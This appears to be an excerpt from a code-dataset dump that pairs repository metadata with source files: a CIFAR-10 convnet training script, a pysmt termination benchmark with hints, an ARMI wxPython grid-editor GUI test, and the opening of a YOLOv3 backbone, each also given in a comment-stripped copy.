sys.path.append(os.pardir)
import pickle
import time
import cupy as cp
import numpy as np
import matplotlib.pyplot as plt
from dataset.cifar10 import load_cifar10
from simple_convnet import SimpleConvNet
from common.trainer import Trainer
(x_train, t_train), (x_test, t_test) = load_cifar10(normalize=False, flatten=False, one_hot_label=True)
x_train = x_train * 2.0 - 255
x_test = x_test * 2.0 - 255
if os.path.exists("ttarray.pkl"):
with open("ttarray.pkl", 'rb') as f:
t_train = pickle.load(f)
print("Loaded Teacher array!")
max_epochs = 25
network = SimpleConvNet(input_dim=(3,32,32),
conv_param = {'filter_num': (32, 32, 64), 'filter_size': 3, 'pad': 1, 'stride': 1},
hidden_size=512, output_size=10, weight_init_std=0.01)
trainer = Trainer(network, x_train, t_train, x_test, t_test,
epochs=max_epochs, mini_batch_size=100,
optimizer='Adam', optimizer_param={'lr': 0.001},
evaluate_sample_num_per_epoch=1000, early_stopping=10)
start = time.time()
trainer.train()
elapsed_time = time.time() - start
print ("elapsed_time:{0}".format(elapsed_time) + "[sec]")
network.save_params("params.pkl")
print("Saved Network Parameters!")
markers = {'train': 'o', 'test': 's'}
x = np.arange(trainer.current_epoch)
plt.plot(x, trainer.train_acc_list, marker='o', label='train', markevery=2)
plt.plot(x, trainer.test_acc_list, marker='s', label='test', markevery=2)
plt.xlabel("epochs")
plt.ylabel("accuracy")
plt.ylim(0, 1.0)
plt.legend(loc='lower right')
plt.show()
np.set_printoptions(threshold=50)
print(np.round(trainer.test_acc_list,3))
| true
| true
|
1c40cb511c8e3b54341078d83202f347436c299f
| 7,306
|
py
|
Python
|
benchmarks/f3_wrong_hints_permutations/scaling_software_termination/14-2Nested_false-termination_16.py
|
EnricoMagnago/F3
|
c863215c318d7d5f258eb9be38c6962cf6863b52
|
[
"MIT"
] | 3
|
2021-04-23T23:29:26.000Z
|
2022-03-23T10:00:30.000Z
|
benchmarks/f3_wrong_hints_permutations/scaling_software_termination/14-2Nested_false-termination_16.py
|
EnricoMagnago/F3
|
c863215c318d7d5f258eb9be38c6962cf6863b52
|
[
"MIT"
] | null | null | null |
benchmarks/f3_wrong_hints_permutations/scaling_software_termination/14-2Nested_false-termination_16.py
|
EnricoMagnago/F3
|
c863215c318d7d5f258eb9be38c6962cf6863b52
|
[
"MIT"
] | 1
|
2021-11-17T22:02:56.000Z
|
2021-11-17T22:02:56.000Z
|
from typing import Tuple, FrozenSet
from pysmt.environment import Environment as PysmtEnv
from pysmt.fnode import FNode
import pysmt.typing as types
from utils import symb_to_next
from hint import Hint, Location
def transition_system(env: PysmtEnv) -> Tuple[FrozenSet[FNode], FNode, FNode,
FNode]:
assert isinstance(env, PysmtEnv)
mgr = env.formula_manager
pc = mgr.Symbol("pc", types.INT)
x = mgr.Symbol("x", types.INT)
y = mgr.Symbol("y", types.INT)
x_pc = symb_to_next(mgr, pc)
x_x = symb_to_next(mgr, x)
x_y = symb_to_next(mgr, y)
symbols = frozenset([pc, x, y])
m_1 = mgr.Int(-1)
n_locs = 3
max_int = n_locs
ints = []
pcs = []
x_pcs = []
for idx in range(n_locs):
num = mgr.Int(idx)
ints.append(num)
pcs.append(mgr.Equals(pc, num))
x_pcs.append(mgr.Equals(x_pc, num))
for idx in range(n_locs, max_int):
num = mgr.Int(idx)
ints.append(num)
pcend = mgr.Equals(pc, m_1)
x_pcend = mgr.Equals(x_pc, m_1)
init = pcs[0]
cfg = []
# pc = 0 & (x >= 0) -> pc' = 1
cond = mgr.GE(x, ints[0])
cfg.append(mgr.Implies(mgr.And(pcs[0], cond), x_pcs[1]))
# pc = 0 & !(x >= 0) -> pc' = -1
cfg.append(mgr.Implies(mgr.And(pcs[0], mgr.Not(cond)), x_pcend))
# pc = 1 -> pc' = 2
cfg.append(mgr.Implies(pcs[1], x_pcs[2]))
# pc = 2 -> pc' = 0
cfg.append(mgr.Implies(pcs[2], x_pcs[0]))
# pc = -1 -> pc' = -1
cfg.append(mgr.Implies(pcend, x_pcend))
trans = []
same_x = mgr.Equals(x_x, x)
same_y = mgr.Equals(x_y, y)
same = mgr.And(same_x, same_y)
# pc = 0 -> same
trans.append(mgr.Implies(pcs[0], same))
# pc = 1 -> x' = x + y & same_y
trans.append(mgr.Implies(pcs[1],
mgr.And(mgr.Equals(x_x, mgr.Plus(x, y)),
same_y)))
# pc = 2 -> same_x & y' = y + 1
trans.append(mgr.Implies(pcs[2],
mgr.And(same_x,
mgr.Equals(x_y, mgr.Plus(y, ints[1])))))
# pc = end -> same
trans.append(mgr.Implies(pcend, same))
trans = mgr.And(*cfg, *trans)
fairness = mgr.Not(mgr.Equals(pc, m_1))
return symbols, init, trans, fairness
def hints(env: PysmtEnv) -> FrozenSet[Hint]:
assert isinstance(env, PysmtEnv)
mgr = env.formula_manager
pc = mgr.Symbol("pc", types.INT)
x = mgr.Symbol("x", types.INT)
y = mgr.Symbol("y", types.INT)
symbs = frozenset([pc, x, y])
m_100 = mgr.Int(-100)
m_1 = mgr.Int(-1)
i_0 = mgr.Int(0)
i_1 = mgr.Int(1)
i_2 = mgr.Int(2)
i_4 = mgr.Int(4)
i_20 = mgr.Int(20)
x_pc = symb_to_next(mgr, pc)
x_x = symb_to_next(mgr, x)
x_y = symb_to_next(mgr, y)
res = []
loc0 = Location(env, mgr.GE(y, m_100), mgr.LE(x, i_20))
loc0.set_progress(1, mgr.Equals(x_y, mgr.Times(x, y)))
loc1 = Location(env, mgr.TRUE(), mgr.GE(x, m_100))
loc1.set_progress(0, mgr.Equals(x_y, m_100))
h_y = Hint("h_y3", env, frozenset([y]), symbs)
h_y.set_locs([loc0, loc1])
res.append(h_y)
loc0 = Location(env, mgr.LE(x, i_20))
loc0.set_progress(1, mgr.Equals(x_x, mgr.Plus(mgr.Times(x, x), i_1)))
loc1 = Location(env, mgr.GE(x, i_20))
loc1.set_progress(0, mgr.LT(x_x, mgr.Times(m_1, x, x)))
h_x = Hint("h_x6", env, frozenset([x]), symbs)
h_x.set_locs([loc0, loc1])
res.append(h_x)
loc0 = Location(env, mgr.GE(x, i_1), mgr.GE(y, i_1))
loc0.set_progress(1, mgr.Equals(x_x, mgr.Times(x, y)))
loc1 = Location(env, mgr.GE(x, i_1), mgr.GE(y, i_1))
loc1.set_progress(2, mgr.GT(x_x, y))
loc2 = Location(env, mgr.GE(x, i_2))
loc2.set_progress(0, mgr.GE(x_x, i_20))
h_x = Hint("h_x4", env, frozenset([x]), symbs)
h_x.set_locs([loc0, loc1, loc2])
res.append(h_x)
stutter = mgr.Equals(x_x, x)
loc = Location(env, mgr.GE(x, i_1), mgr.GE(y, i_1), stutterT=stutter)
loc.set_progress(0, mgr.Equals(x_x, mgr.Plus(x, y)))
h_x = Hint("h_x1", env, frozenset([x]), symbs)
h_x.set_locs([loc])
res.append(h_x)
loc0 = Location(env, mgr.GE(y, m_100), mgr.LE(x, i_20))
loc0.set_progress(1, mgr.Equals(x_y, mgr.Times(x, y)))
loc1 = Location(env, mgr.TRUE(), mgr.GE(x, m_100))
loc1.set_progress(2, mgr.GE(x_y, i_20))
loc2 = Location(env, mgr.TRUE())
loc2.set_progress(0, mgr.And(mgr.GE(x_y, m_100), mgr.LE(x_y, i_0)))
h_y = Hint("h_y4", env, frozenset([y]), symbs)
h_y.set_locs([loc0, loc1, loc2])
res.append(h_y)
loc0 = Location(env, mgr.GE(y, m_100), mgr.LE(x, i_20))
loc0.set_progress(1, mgr.Equals(x_y, mgr.Plus(x, y)))
loc1 = Location(env, mgr.TRUE(), mgr.GE(x, m_100))
loc1.set_progress(0, mgr.Equals(x_y, m_100))
h_y = Hint("h_y2", env, frozenset([y]), symbs)
h_y.set_locs([loc0, loc1])
res.append(h_y)
loc0 = Location(env, mgr.GE(x, i_1), mgr.GE(y, i_1))
loc0.set_progress(1, mgr.Equals(x_x, mgr.Times(x, y)))
loc1 = Location(env, mgr.GE(x, i_1), mgr.GE(y, i_1))
loc1.set_progress(0, mgr.Equals(x_x, y))
h_x = Hint("h_x3", env, frozenset([x]), symbs)
h_x.set_locs([loc0, loc1])
res.append(h_x)
loc0 = Location(env, mgr.TRUE())
loc0.set_progress(0, mgr.TRUE())
h_pc = Hint("h_pc1", env, frozenset([pc]), symbs)
h_pc.set_locs([loc0])
res.append(h_pc)
stutter = mgr.Equals(x_y, y)
loc = Location(env, mgr.TRUE(), mgr.LE(x, i_20), stutterT=stutter)
loc.set_progress(0, mgr.Equals(x_y, mgr.Plus(x, y)))
h_y = Hint("h_y1", env, frozenset([y]), symbs)
h_y.set_locs([loc])
res.append(h_y)
loc0 = Location(env, mgr.GE(x, i_1), mgr.GT(y, i_1))
loc0.set_progress(1, mgr.Equals(x_x, mgr.Plus(mgr.Times(x, y), i_1)))
loc1 = Location(env, mgr.GE(x, i_2))
loc1.set_progress(2, mgr.LT(x_x, mgr.Times(m_1, x, x)))
loc2 = Location(env, mgr.LE(x, i_4))
loc2.set_progress(0, mgr.GE(x_x, mgr.Div(x, x)))
h_x = Hint("h_x7", env, frozenset([x]), symbs)
h_x.set_locs([loc0, loc1, loc2])
res.append(h_x)
stutter = mgr.Equals(x_y, y)
loc = Location(env, mgr.TRUE(), mgr.LE(x, i_20), stutterT=stutter)
loc.set_progress(0, mgr.Equals(x_y, mgr.Plus(i_1, y)))
h_y = Hint("h_y0", env, frozenset([y]), symbs)
h_y.set_locs([loc])
res.append(h_y)
loc0 = Location(env, mgr.GE(y, m_100))
loc0.set_progress(1, mgr.Equals(x_y, mgr.Times(y, y)))
loc1 = Location(env, mgr.GE(y, i_0))
loc1.set_progress(0, mgr.GE(x_y, mgr.Plus(y, i_1)))
h_y = Hint("h_y6", env, frozenset([y]), symbs)
h_y.set_locs([loc0, loc1])
res.append(h_y)
loc0 = Location(env, mgr.GE(y, i_0), mgr.GE(pc, i_1))
loc0.set_progress(1, mgr.Equals(x_y, mgr.Plus(y, pc)))
loc1 = Location(env, mgr.GE(y, i_1))
loc1.set_progress(0, mgr.Equals(x_y, y))
h_y = Hint("h_y7", env, frozenset([y]), symbs)
h_y.set_locs([loc0, loc1])
res.append(h_y)
loc0 = Location(env, mgr.Equals(pc, i_1))
loc0.set_progress(1, mgr.GT(x_pc, pc))
loc1 = Location(env, mgr.GE(pc, i_2))
loc1.set_progress(0, mgr.Equals(x_pc, mgr.Div(pc, pc)))
h_pc = Hint("h_pc2", env, frozenset([pc]), symbs)
h_pc.set_locs([loc0, loc1])
res.append(h_pc)
return frozenset(res)
| 31.356223
| 77
| 0.586915
|
from typing import Tuple, FrozenSet
from pysmt.environment import Environment as PysmtEnv
from pysmt.fnode import FNode
import pysmt.typing as types
from utils import symb_to_next
from hint import Hint, Location
def transition_system(env: PysmtEnv) -> Tuple[FrozenSet[FNode], FNode, FNode,
FNode]:
assert isinstance(env, PysmtEnv)
mgr = env.formula_manager
pc = mgr.Symbol("pc", types.INT)
x = mgr.Symbol("x", types.INT)
y = mgr.Symbol("y", types.INT)
x_pc = symb_to_next(mgr, pc)
x_x = symb_to_next(mgr, x)
x_y = symb_to_next(mgr, y)
symbols = frozenset([pc, x, y])
m_1 = mgr.Int(-1)
n_locs = 3
max_int = n_locs
ints = []
pcs = []
x_pcs = []
for idx in range(n_locs):
num = mgr.Int(idx)
ints.append(num)
pcs.append(mgr.Equals(pc, num))
x_pcs.append(mgr.Equals(x_pc, num))
for idx in range(n_locs, max_int):
num = mgr.Int(idx)
ints.append(num)
pcend = mgr.Equals(pc, m_1)
x_pcend = mgr.Equals(x_pc, m_1)
init = pcs[0]
cfg = []
cond = mgr.GE(x, ints[0])
cfg.append(mgr.Implies(mgr.And(pcs[0], cond), x_pcs[1]))
# pc = 0 & !(x >= 0) -> pc' = -1
cfg.append(mgr.Implies(mgr.And(pcs[0], mgr.Not(cond)), x_pcend))
cfg.append(mgr.Implies(pcs[1], x_pcs[2]))
# pc = 2 -> pc' = 0
cfg.append(mgr.Implies(pcs[2], x_pcs[0]))
cfg.append(mgr.Implies(pcend, x_pcend))
trans = []
same_x = mgr.Equals(x_x, x)
same_y = mgr.Equals(x_y, y)
same = mgr.And(same_x, same_y)
# pc = 0 -> same
trans.append(mgr.Implies(pcs[0], same))
# pc = 1 -> x' = x + y & same_y
trans.append(mgr.Implies(pcs[1],
mgr.And(mgr.Equals(x_x, mgr.Plus(x, y)),
same_y)))
trans.append(mgr.Implies(pcs[2],
mgr.And(same_x,
mgr.Equals(x_y, mgr.Plus(y, ints[1])))))
# pc = end -> same
trans.append(mgr.Implies(pcend, same))
trans = mgr.And(*cfg, *trans)
fairness = mgr.Not(mgr.Equals(pc, m_1))
return symbols, init, trans, fairness
def hints(env: PysmtEnv) -> FrozenSet[Hint]:
assert isinstance(env, PysmtEnv)
mgr = env.formula_manager
pc = mgr.Symbol("pc", types.INT)
x = mgr.Symbol("x", types.INT)
y = mgr.Symbol("y", types.INT)
symbs = frozenset([pc, x, y])
m_100 = mgr.Int(-100)
m_1 = mgr.Int(-1)
i_0 = mgr.Int(0)
i_1 = mgr.Int(1)
i_2 = mgr.Int(2)
i_4 = mgr.Int(4)
i_20 = mgr.Int(20)
x_pc = symb_to_next(mgr, pc)
x_x = symb_to_next(mgr, x)
x_y = symb_to_next(mgr, y)
res = []
loc0 = Location(env, mgr.GE(y, m_100), mgr.LE(x, i_20))
loc0.set_progress(1, mgr.Equals(x_y, mgr.Times(x, y)))
loc1 = Location(env, mgr.TRUE(), mgr.GE(x, m_100))
loc1.set_progress(0, mgr.Equals(x_y, m_100))
h_y = Hint("h_y3", env, frozenset([y]), symbs)
h_y.set_locs([loc0, loc1])
res.append(h_y)
loc0 = Location(env, mgr.LE(x, i_20))
loc0.set_progress(1, mgr.Equals(x_x, mgr.Plus(mgr.Times(x, x), i_1)))
loc1 = Location(env, mgr.GE(x, i_20))
loc1.set_progress(0, mgr.LT(x_x, mgr.Times(m_1, x, x)))
h_x = Hint("h_x6", env, frozenset([x]), symbs)
h_x.set_locs([loc0, loc1])
res.append(h_x)
loc0 = Location(env, mgr.GE(x, i_1), mgr.GE(y, i_1))
loc0.set_progress(1, mgr.Equals(x_x, mgr.Times(x, y)))
loc1 = Location(env, mgr.GE(x, i_1), mgr.GE(y, i_1))
loc1.set_progress(2, mgr.GT(x_x, y))
loc2 = Location(env, mgr.GE(x, i_2))
loc2.set_progress(0, mgr.GE(x_x, i_20))
h_x = Hint("h_x4", env, frozenset([x]), symbs)
h_x.set_locs([loc0, loc1, loc2])
res.append(h_x)
stutter = mgr.Equals(x_x, x)
loc = Location(env, mgr.GE(x, i_1), mgr.GE(y, i_1), stutterT=stutter)
loc.set_progress(0, mgr.Equals(x_x, mgr.Plus(x, y)))
h_x = Hint("h_x1", env, frozenset([x]), symbs)
h_x.set_locs([loc])
res.append(h_x)
loc0 = Location(env, mgr.GE(y, m_100), mgr.LE(x, i_20))
loc0.set_progress(1, mgr.Equals(x_y, mgr.Times(x, y)))
loc1 = Location(env, mgr.TRUE(), mgr.GE(x, m_100))
loc1.set_progress(2, mgr.GE(x_y, i_20))
loc2 = Location(env, mgr.TRUE())
loc2.set_progress(0, mgr.And(mgr.GE(x_y, m_100), mgr.LE(x_y, i_0)))
h_y = Hint("h_y4", env, frozenset([y]), symbs)
h_y.set_locs([loc0, loc1, loc2])
res.append(h_y)
loc0 = Location(env, mgr.GE(y, m_100), mgr.LE(x, i_20))
loc0.set_progress(1, mgr.Equals(x_y, mgr.Plus(x, y)))
loc1 = Location(env, mgr.TRUE(), mgr.GE(x, m_100))
loc1.set_progress(0, mgr.Equals(x_y, m_100))
h_y = Hint("h_y2", env, frozenset([y]), symbs)
h_y.set_locs([loc0, loc1])
res.append(h_y)
loc0 = Location(env, mgr.GE(x, i_1), mgr.GE(y, i_1))
loc0.set_progress(1, mgr.Equals(x_x, mgr.Times(x, y)))
loc1 = Location(env, mgr.GE(x, i_1), mgr.GE(y, i_1))
loc1.set_progress(0, mgr.Equals(x_x, y))
h_x = Hint("h_x3", env, frozenset([x]), symbs)
h_x.set_locs([loc0, loc1])
res.append(h_x)
loc0 = Location(env, mgr.TRUE())
loc0.set_progress(0, mgr.TRUE())
h_pc = Hint("h_pc1", env, frozenset([pc]), symbs)
h_pc.set_locs([loc0])
res.append(h_pc)
stutter = mgr.Equals(x_y, y)
loc = Location(env, mgr.TRUE(), mgr.LE(x, i_20), stutterT=stutter)
loc.set_progress(0, mgr.Equals(x_y, mgr.Plus(x, y)))
h_y = Hint("h_y1", env, frozenset([y]), symbs)
h_y.set_locs([loc])
res.append(h_y)
loc0 = Location(env, mgr.GE(x, i_1), mgr.GT(y, i_1))
loc0.set_progress(1, mgr.Equals(x_x, mgr.Plus(mgr.Times(x, y), i_1)))
loc1 = Location(env, mgr.GE(x, i_2))
loc1.set_progress(2, mgr.LT(x_x, mgr.Times(m_1, x, x)))
loc2 = Location(env, mgr.LE(x, i_4))
loc2.set_progress(0, mgr.GE(x_x, mgr.Div(x, x)))
h_x = Hint("h_x7", env, frozenset([x]), symbs)
h_x.set_locs([loc0, loc1, loc2])
res.append(h_x)
stutter = mgr.Equals(x_y, y)
loc = Location(env, mgr.TRUE(), mgr.LE(x, i_20), stutterT=stutter)
loc.set_progress(0, mgr.Equals(x_y, mgr.Plus(i_1, y)))
h_y = Hint("h_y0", env, frozenset([y]), symbs)
h_y.set_locs([loc])
res.append(h_y)
loc0 = Location(env, mgr.GE(y, m_100))
loc0.set_progress(1, mgr.Equals(x_y, mgr.Times(y, y)))
loc1 = Location(env, mgr.GE(y, i_0))
loc1.set_progress(0, mgr.GE(x_y, mgr.Plus(y, i_1)))
h_y = Hint("h_y6", env, frozenset([y]), symbs)
h_y.set_locs([loc0, loc1])
res.append(h_y)
loc0 = Location(env, mgr.GE(y, i_0), mgr.GE(pc, i_1))
loc0.set_progress(1, mgr.Equals(x_y, mgr.Plus(y, pc)))
loc1 = Location(env, mgr.GE(y, i_1))
loc1.set_progress(0, mgr.Equals(x_y, y))
h_y = Hint("h_y7", env, frozenset([y]), symbs)
h_y.set_locs([loc0, loc1])
res.append(h_y)
loc0 = Location(env, mgr.Equals(pc, i_1))
loc0.set_progress(1, mgr.GT(x_pc, pc))
loc1 = Location(env, mgr.GE(pc, i_2))
loc1.set_progress(0, mgr.Equals(x_pc, mgr.Div(pc, pc)))
h_pc = Hint("h_pc2", env, frozenset([pc]), symbs)
h_pc.set_locs([loc0, loc1])
res.append(h_pc)
return frozenset(res)
| true
| true
|
1c40cd0ec916c7cb8d387f5d9e7a69fcb7c06b9b
| 7,379
|
py
|
Python
|
armi/utils/tests/test_gridGui.py
|
keckler/armi
|
b5f95b4795aa21e00fd6786f6994862a4bdccb16
|
[
"Apache-2.0"
] | 162
|
2019-11-01T17:35:58.000Z
|
2022-03-18T04:22:39.000Z
|
armi/utils/tests/test_gridGui.py
|
keckler/armi
|
b5f95b4795aa21e00fd6786f6994862a4bdccb16
|
[
"Apache-2.0"
] | 315
|
2019-11-01T17:32:05.000Z
|
2022-03-30T03:51:42.000Z
|
armi/utils/tests/test_gridGui.py
|
keckler/armi
|
b5f95b4795aa21e00fd6786f6994862a4bdccb16
|
[
"Apache-2.0"
] | 55
|
2019-11-01T16:59:59.000Z
|
2022-03-25T18:19:06.000Z
|
# Copyright 2021 Google, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Tests for gridEditor.py.
By default, this would open the app in your primary display and steal control from your mouse and keyboard while the
test is running. This means that if your display is smaller than 1000 x 1000, or if you move your mouse when the test is
running, the test might fail even when things are fine.
These issues can be resolved by running the test in a virtual display. To do so, `pip install pytest-xvfb`,
and run `pytest test_gridGui.py` as usual. If you wish to change the resolution of the virtual display, you can modify
the `xvfb_width` and `xvfb_height` in `pytest.ini`.
After you have installed pytest-xvfb, you will no longer see the app displayed on your screen, which can make debugging
harder. Thus, during debugging, you may want the app to appear on your display by setting the `--no-xvfb` flag, and
have the print statements print to your console by setting the `--capture=tee-sys` flag, like this:
```
pytest --no-xvfb --capture=tee-sys test_gridGui.py
```
Note:
These tests currently require a rather specific environment:
1. wxPython needs to be installed, and
2. The test needs to run in a pure X11 environment (doesn't work in Wayland or XWayland, unfortunately).
To check if you are in an X11 environment, run this command:
```
loginctl list-sessions --no-legend | \
cut --delimiter=' ' --field=1 | \
xargs loginctl show-session --property=Type --value
```
If it outputs "x11", it should work (and if it outputs "wayland", it probably won't, for now).
"""
# pylint: disable=missing-function-docstring,missing-class-docstring,abstract-method,protected-access
import asyncio
import os
import pytest
import time
import unittest
import test.support
# wxpython is an optional dependency, and without it we cant do much of anything. This
# should raise a unittest.SkipTest if it can't find wx, signalling to pytest to skip the
# rest of the module. Neat!
wx = test.support.import_module("wx")
from armi import configure, getApp
if getApp() is None:
configure()
from armi.utils import gridEditor
_SECONDS_PER_TICK = 0.05
def _wait(num_ticks: int) -> None:
time.sleep(num_ticks * _SECONDS_PER_TICK)
def _findPointInWindow(
window: wx.Window, offsetFromLeft: float = 0.5, offsetFromTop: float = 0.5
) -> wx.Point:
"""Given a window, return a point in it. Defaults to the center of the window object.
If offsets are smaller than 0 or greater than 1, this would return a point outside the window object.
"""
rect: wx.Rect = window.GetScreenRect()
x = rect.x + int(offsetFromLeft * rect.width)
if x == rect.x + rect.width:
x = rect.x + rect.width - 1
y = rect.y + int(offsetFromTop * rect.height)
if y == rect.y + rect.height:
y = rect.y + rect.height - 1
return wx.Point(x, y)
class GuiTestCase(unittest.TestCase):
"""Provides scaffolding for a GUI test.
Without this scaffolding, the GUI's main loop would block the UIActionSimulator. Thus, the simulated actions and
asserts must be run asynchronously within the GUI's event loop. Since the asserts are also run asynchronously,
we need to make sure that the test does not end until all assert statements have been called, and that the test
outputs are properly passed to the test framework. The app is also properly torn down after each test.
This way, the user only needs to define the simulated actions and the expected behavior in order to write a UI test.
"""
def initializeGui(self):
"""The user can override this to initialize the GUI differently.
Note: This method is called in self.run(), before super().run. We deliberately avoid naming this 'setUp',
because super().run internally calls self.setUp, which would be too late.
"""
self.app = wx.App()
self.frame = wx.Frame(
None, wx.ID_ANY, title="Grid Blueprints UI", pos=(0, 0), size=(1000, 1000)
)
self.gui = gridEditor.GridBlueprintControl(self.frame)
self.frame.Show()
self.inputSimulator = wx.UIActionSimulator()
def _cleanUpApp(self):
for window in wx.GetTopLevelWindows():
try:
assert window.IsModal()
except (AttributeError, AssertionError):
window and window.Close()
else:
window.EndModal(0)
self.app.ScheduleForDestruction(window)
def _runAsync(self, result):
super().run(result)
self._cleanUpApp()
self._testCompleted.set_result(None)
def run(self, result=None):
"""Overrides unittest.TestCase.run."""
self.initializeGui()
loop = asyncio.get_event_loop()
self._testCompleted = loop.create_future()
wx.CallLater(0, self._runAsync, result)
self.app.MainLoop()
loop.run_until_complete(self._testCompleted)
return result
@pytest.mark.skipif(
not bool(os.environ.get("ARMI_GUI_TESTS", False)),
reason="GUI tests require a rather specific environment (see above), so these tests are opt-in",
)
class Test(GuiTestCase):
def test_setNumRings(self):
# Set the number of rings to 1
self.inputSimulator.MouseMove(
_findPointInWindow(self.gui.controls.ringControl, offsetFromLeft=0.15)
)
_wait(num_ticks=5)
self.inputSimulator.MouseDblClick()
_wait(num_ticks=5)
self.inputSimulator.KeyDown(49) # 49 is the keycode for the "1" key
_wait(num_ticks=1)
self.inputSimulator.KeyUp(49)
_wait(num_ticks=5)
# Select (i, j) specifier
self.inputSimulator.MouseMove(_findPointInWindow(self.gui.controls.labelMode))
_wait(num_ticks=5)
self.inputSimulator.MouseDown()
_wait(num_ticks=1)
self.inputSimulator.MouseUp()
_wait(num_ticks=5)
self.inputSimulator.MouseMove(
_findPointInWindow(self.gui.controls.labelMode, offsetFromTop=1.5)
)
_wait(num_ticks=5)
self.inputSimulator.MouseDown()
_wait(num_ticks=1)
self.inputSimulator.MouseUp()
_wait(num_ticks=5)
# Click the Apply button
self.inputSimulator.MouseMove(_findPointInWindow(self.gui.controls.ringApply))
_wait(num_ticks=5)
self.inputSimulator.MouseDown()
_wait(num_ticks=1)
self.inputSimulator.MouseUp()
_wait(num_ticks=5)
# Assert that there is only one grid cell
gridCellIndices = self.gui.clicker.indicesToPdcId
self.assertEqual(1, len(gridCellIndices))
# Assert that the grid cell contains "0, 0'
labels = [self.gui.clicker._getLabel(idx)[0] for idx in gridCellIndices]
self.assertEqual("0, 0", labels[0])
if __name__ == "__main__":
unittest.main()
| 38.432292
| 120
| 0.69237
|
import asyncio
import os
import pytest
import time
import unittest
import test.support
# rest of the module. Neat!
wx = test.support.import_module("wx")
from armi import configure, getApp
if getApp() is None:
configure()
from armi.utils import gridEditor
_SECONDS_PER_TICK = 0.05
def _wait(num_ticks: int) -> None:
time.sleep(num_ticks * _SECONDS_PER_TICK)
def _findPointInWindow(
window: wx.Window, offsetFromLeft: float = 0.5, offsetFromTop: float = 0.5
) -> wx.Point:
rect: wx.Rect = window.GetScreenRect()
x = rect.x + int(offsetFromLeft * rect.width)
if x == rect.x + rect.width:
x = rect.x + rect.width - 1
y = rect.y + int(offsetFromTop * rect.height)
if y == rect.y + rect.height:
y = rect.y + rect.height - 1
return wx.Point(x, y)
class GuiTestCase(unittest.TestCase):
def initializeGui(self):
self.app = wx.App()
self.frame = wx.Frame(
None, wx.ID_ANY, title="Grid Blueprints UI", pos=(0, 0), size=(1000, 1000)
)
self.gui = gridEditor.GridBlueprintControl(self.frame)
self.frame.Show()
self.inputSimulator = wx.UIActionSimulator()
def _cleanUpApp(self):
for window in wx.GetTopLevelWindows():
try:
assert window.IsModal()
except (AttributeError, AssertionError):
window and window.Close()
else:
window.EndModal(0)
self.app.ScheduleForDestruction(window)
def _runAsync(self, result):
super().run(result)
self._cleanUpApp()
self._testCompleted.set_result(None)
def run(self, result=None):
self.initializeGui()
loop = asyncio.get_event_loop()
self._testCompleted = loop.create_future()
wx.CallLater(0, self._runAsync, result)
self.app.MainLoop()
loop.run_until_complete(self._testCompleted)
return result
@pytest.mark.skipif(
not bool(os.environ.get("ARMI_GUI_TESTS", False)),
reason="GUI tests require a rather specific environment (see above), so these tests are opt-in",
)
class Test(GuiTestCase):
def test_setNumRings(self):
# Set the number of rings to 1
self.inputSimulator.MouseMove(
_findPointInWindow(self.gui.controls.ringControl, offsetFromLeft=0.15)
)
_wait(num_ticks=5)
self.inputSimulator.MouseDblClick()
_wait(num_ticks=5)
self.inputSimulator.KeyDown(49) # 49 is the keycode for the "1" key
_wait(num_ticks=1)
self.inputSimulator.KeyUp(49)
_wait(num_ticks=5)
# Select (i, j) specifier
self.inputSimulator.MouseMove(_findPointInWindow(self.gui.controls.labelMode))
_wait(num_ticks=5)
self.inputSimulator.MouseDown()
_wait(num_ticks=1)
self.inputSimulator.MouseUp()
_wait(num_ticks=5)
self.inputSimulator.MouseMove(
_findPointInWindow(self.gui.controls.labelMode, offsetFromTop=1.5)
)
_wait(num_ticks=5)
self.inputSimulator.MouseDown()
_wait(num_ticks=1)
self.inputSimulator.MouseUp()
_wait(num_ticks=5)
# Click the Apply button
self.inputSimulator.MouseMove(_findPointInWindow(self.gui.controls.ringApply))
_wait(num_ticks=5)
self.inputSimulator.MouseDown()
_wait(num_ticks=1)
self.inputSimulator.MouseUp()
_wait(num_ticks=5)
# Assert that there is only one grid cell
gridCellIndices = self.gui.clicker.indicesToPdcId
self.assertEqual(1, len(gridCellIndices))
# Assert that the grid cell contains "0, 0'
labels = [self.gui.clicker._getLabel(idx)[0] for idx in gridCellIndices]
self.assertEqual("0, 0", labels[0])
if __name__ == "__main__":
unittest.main()
| true
| true
|
1c40cd99485425830543e682f8506d0020f2d87f
| 16,734
|
py
|
Python
|
detection/models/detection/yolo/backbone.py
|
stanford-policylab/surveilling-surveillance
|
bbb9a147927a6342eecfe07ffa756b3acdb63f35
|
[
"MIT"
] | 8
|
2021-05-21T03:38:52.000Z
|
2021-11-21T08:32:41.000Z
|
detection/models/detection/yolo/backbone.py
|
stanford-policylab/surveilling-surveillance
|
bbb9a147927a6342eecfe07ffa756b3acdb63f35
|
[
"MIT"
] | null | null | null |
detection/models/detection/yolo/backbone.py
|
stanford-policylab/surveilling-surveillance
|
bbb9a147927a6342eecfe07ffa756b3acdb63f35
|
[
"MIT"
] | 1
|
2021-06-13T21:49:14.000Z
|
2021-06-13T21:49:14.000Z
|
'''
ABOUT THIS SCRIPT:
This is a yolov3 implementation that constructs the appropriate
yolov3 model layers and performs forward runs as per these modules
This script is a slightly modified version of the follwoing repo:
https://github.com/eriklindernoren/PyTorch-YOLOv3.git
'''
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
from .utils import (slice_boundary,
parse_model_config,
to_cpu,
build_targets)
from . import constants as C
def create_modules(module_defs, ignore_width):
"""
Constructs module list of layer blocks from module configuration in module_defs
"""
hyperparams = module_defs.pop(0)
output_filters = [int(hyperparams["channels"])]
module_list = nn.ModuleList()
for module_i, module_def in enumerate(module_defs):
modules = nn.Sequential()
if module_def["type"] == "convolutional":
bn = int(module_def["batch_normalize"])
filters = int(module_def["filters"])
kernel_size = int(module_def["size"])
pad = (kernel_size - 1) // 2
modules.add_module(
f"conv_{module_i}",
nn.Conv2d(
in_channels=output_filters[-1],
out_channels=filters,
kernel_size=kernel_size,
stride=int(module_def["stride"]),
padding=pad,
bias=not bn,
),
)
if bn:
modules.add_module(f"batch_norm_{module_i}", nn.BatchNorm2d(
filters, momentum=0.9, eps=1e-5))
if module_def["activation"] == "leaky":
